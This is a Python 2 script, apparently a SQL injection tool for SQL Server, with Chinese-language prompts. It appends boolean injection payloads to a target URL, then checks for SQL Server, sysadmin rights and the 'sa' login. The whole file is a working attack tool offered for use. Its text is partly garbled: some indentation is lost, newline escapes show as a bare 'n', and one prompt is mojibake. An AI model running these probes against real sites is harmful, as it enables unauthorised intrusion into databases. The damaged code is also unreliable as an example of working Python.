# Code by zhaoxiaobu Email: little.bu@hotmail.com  
#-*- coding: UTF-8 -*-  
from sys import exit  
from urllib import urlopen  
from string import join,strip  
from re import search  
 
def is_sqlable(): 
  sql1="%20and%201=2" 
  sql2="%20and%201=1" 
  urlfile1=urlopen(url+sql1) 
  urlfile2=urlopen(url+sql2) 
  htmlcodes1=urlfile1.read() 
  htmlcodes2=urlfile2.read() 
  if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
  print "[信息]恭喜!這個URL是有注入漏洞的!n" 
  print "[信息]現在判斷數據庫是否是SQL Server,請耐心等候....."  
  is_SQLServer() 
  else: 
  print "[錯誤]你確定這個URL能用?換個別的試試吧!n"

def is_SQLServer(): 
  sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  if not search(judge,htmlcodes): 
  print "[錯誤]數據庫好像不是SQL Server的!n" 
  else: 
  print "[信息]確認是SQL Server數據庫!n" 
  print "[信息]開始檢測當前數據庫用戶權限,請耐心等待......" 
  is_sysadmin() 
 
 
def is_sysadmin():  
  sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[錯誤]當前數據庫用戶不具有sysadmin權限!n" 
  else:  
    print "[信息]當前數據庫用戶具有sysadmin權限!n" 
    print "[信息]檢測當前用戶是不是SA,請耐心等待......" 
    is_sa()  
 
def is_sa():  
  sql = "%20and%20'sa'=(select%20System_user)"; 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[錯誤]當前數據庫用戶不是SA!n" 
  else:  
    print "[信息]當前數據庫用戶是SA!n" 
 
print "n########################################################################n"  
print "            ^o^SQL Server注入利用工具^o^     "  
print "           Email: little.bu@hotmail.comn"  
print "========================================================================";  
url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:')  
if url == '':  
  print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"  
  exit(1)  
 
judge = raw_input("[信息]請?zhí)峁┮粋€判斷字符串.n判斷字符串:")  
if judge == '':  
  print "[錯誤]判斷字符串不能為空!"  
  exit(1)  
 
is_sqlable()